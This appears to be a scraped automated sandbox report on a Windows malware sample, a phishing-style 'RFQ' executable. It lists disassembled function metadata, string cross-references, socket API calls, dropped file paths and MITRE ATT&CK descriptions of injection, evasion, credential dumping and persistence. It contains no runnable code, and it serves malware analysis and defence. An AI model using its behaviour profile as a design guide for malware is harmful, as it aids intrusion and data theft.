String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 8bf0e7089905c60f9f234c021be23dbcde9c0c118d046738ebb6b3f01b835c55
Instruction ID: 20c73d2e16f36251f0d52597a412e790fd06773344074b5265d7cfcd60084832
Opcode Fuzzy Hash: 8bf0e7089905c60f9f234c021be23dbcde9c0c118d046738ebb6b3f01b835c55
Instruction Fuzzy Hash: B9518AB1515B428FC324EFA4C5807D7B7E8AF84304F0488BEEABA87241E7749745CB96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AXeOTfZcitaZASZZQaupEOhzdyJUy.exePID: 1704, Parent PID: 2212COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	36
Total number of Limit Nodes:	5

Executed Functions

Function 04D51CA7 Relevance: 36.7, Strings: 29, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 04D51E0B
'd, xrefs: 04D51DDC
B, xrefs: 04D51EF0
1, xrefs: 04D51FE2
u, xrefs: 04D51FE9
bP, xrefs: 04D524A5
pM, xrefs: 04D51EFA
Q, xrefs: 04D5203C
R, xrefs: 04D51FB6
Mb, xrefs: 04D51F14
%, xrefs: 04D51CBA
., xrefs: 04D51CE0
&;, xrefs: 04D51DA0
z, xrefs: 04D52028
], xrefs: 04D51ED2
C, xrefs: 04D51CF5
~5, xrefs: 04D51D4C
CG, xrefs: 04D51D38
6@, xrefs: 04D51D09
6, xrefs: 04D51F47
-%, xrefs: 04D52405
0j|a, xrefs: 04D52252
U, xrefs: 04D51E29
5y, xrefs: 04D51D60
Q, xrefs: 04D51E01
78, xrefs: 04D52050
k, xrefs: 04D51F84
0, xrefs: 04D5210A
], xrefs: 04D51F7A

Memory Dump Source

Source File: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4be0000_AXeOTfZcitaZASZZQaupEOhzdyJUy.jbxd

Yara matches

Similarity

API ID:
String ID: %$&;$'$'d$-%$0$0j|a$1$5y$6@$78$B$CG$Mb$Q$Q$R$U$]$]$bP$k$pM$u$z$~5$.$6$C
API String ID: 0-1234503085
Opcode ID: d8acb7dbbe29e4b014de1358fbc7c077fe705e00c130e19a8e926b8e745e4934
Instruction ID: ef09cf6b60a6ca8ec24dfc3796ce2f64fdbaead60510dca208052367b4b16d88
Opcode Fuzzy Hash: d8acb7dbbe29e4b014de1358fbc7c077fe705e00c130e19a8e926b8e745e4934
Instruction Fuzzy Hash: 7C42B2B0E05229CBEF24CF44C998BDDBBB1BB45308F1081D9D94D6B291DBB56A89CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02167F5B Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 665
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(50F0458D,0000FFFF,00001006,?,00000004), ref: 021686F1

Strings

&br=9, xrefs: 02168354, 02168357
dat=, xrefs: 02168274
80, xrefs: 0216809D
&un=, xrefs: 0216832E, 02168333

Memory Dump Source

Source File: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2160000_AXeOTfZcitaZASZZQaupEOhzdyJUy.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID: &br=9$&un=$80$dat=
API String ID: 3981526788-3709368510
Opcode ID: 48c65a033b5297e510491e088682cd5a325ab94fb5814f89591bb8c82a192207
Instruction ID: afa681a18dfb76c84f36eb76d6c4092994f5ec68a8c92584a4c7b7dec62e9cde
Opcode Fuzzy Hash: 48c65a033b5297e510491e088682cd5a325ab94fb5814f89591bb8c82a192207
Instruction Fuzzy Hash: CD4282B19407059FDB25DF68C888EFEB3BAEF48304F14852EE51A97245E730A955CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D5F487 Relevance: 6.4, Strings: 5, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

s, xrefs: 04D5F503
6, xrefs: 04D5F511
S, xrefs: 04D5F4FC
\, xrefs: 04D5F518
O, xrefs: 04D5F50A

Memory Dump Source

Source File: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4be0000_AXeOTfZcitaZASZZQaupEOhzdyJUy.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: 859feaa002bd9ce21743b319a4b0af4fbe97b03c00844b5a4ff23fe28e3ad9c0
Instruction ID: 1237a3e94d249355dd8c55601eda3cb78ef5902ff67b23e7bd7793eab3b8ede1
Opcode Fuzzy Hash: 859feaa002bd9ce21743b319a4b0af4fbe97b03c00844b5a4ff23fe28e3ad9c0
Instruction Fuzzy Hash: 1E4166B2900119BBDB10EF94EC48EEEB3B8EF48314F004659ED099B250E775BA548BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0218AC0B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32(0216878D,02189082,?,?,0216878D,?,50F0458D), ref: 0218AC3D

Memory Dump Source

Source File: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2160000_AXeOTfZcitaZASZZQaupEOhzdyJUy.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 6ed64a9acaecbe815a553507195b68e78d68cb784be884024a98f6e85433e993
Instruction ID: d2eb645cb9460573502d4b188a386f855b676758b9b894d80229442d10e07719
Opcode Fuzzy Hash: 6ed64a9acaecbe815a553507195b68e78d68cb784be884024a98f6e85433e993
Instruction Fuzzy Hash: 8CE08C362806047BC220FA69EC50DEB77ADDFC9711F14841AFA08A7200C671BA118BF4

Uniqueness

Uniqueness Score: -1.00%

Function 04D6FCC7 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4be0000_AXeOTfZcitaZASZZQaupEOhzdyJUy.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b86a2850301df85eeece1b95c2f33a61817b11e884cb1200d0e811ce2ee3d2d
Instruction ID: 8dcdb8d76c2fd3f0d352fc66a2b33c6c128b9d853e841da75de8977f80ddc087
Opcode Fuzzy Hash: 2b86a2850301df85eeece1b95c2f33a61817b11e884cb1200d0e811ce2ee3d2d
Instruction Fuzzy Hash: 6C01C4B2214148BBDB44DE99DC81EEB77ADEFCD714F108109BA09A3280D630F851CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04D5F480 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4be0000_AXeOTfZcitaZASZZQaupEOhzdyJUy.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeee4a31845e55d0ef972cf104c85118a6e03836b61c8ea31a912b1ac38adc4d
Instruction ID: 548a20d75c4879713a98d69c743d076cd9f06d4239af890ec246d70582ca12b8
Opcode Fuzzy Hash: aeee4a31845e55d0ef972cf104c85118a6e03836b61c8ea31a912b1ac38adc4d
Instruction Fuzzy Hash: F1F0BBA1A142197AFF10FBA4EC45F7673A8DB08214F0002D9BD0D9B1D1E931AD9086A5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ-LOTUS 2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\27-17zLkR9

C:\Users\user\AppData\Local\Temp\Minken.exe

C:\Users\user\AppData\Local\Temp\Minken.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t1a5bob.t2e.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r04wbpr0.oz2.psm1

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Keeling\Imblaze\Gorget\Cowpuncher.oml

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Optimummet29\Strelsens.Reg135

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Stewed\eufomane.mul

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Stewed\manifesterede.pap

Windows Analysis Report
RFQ-LOTUS 2024.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre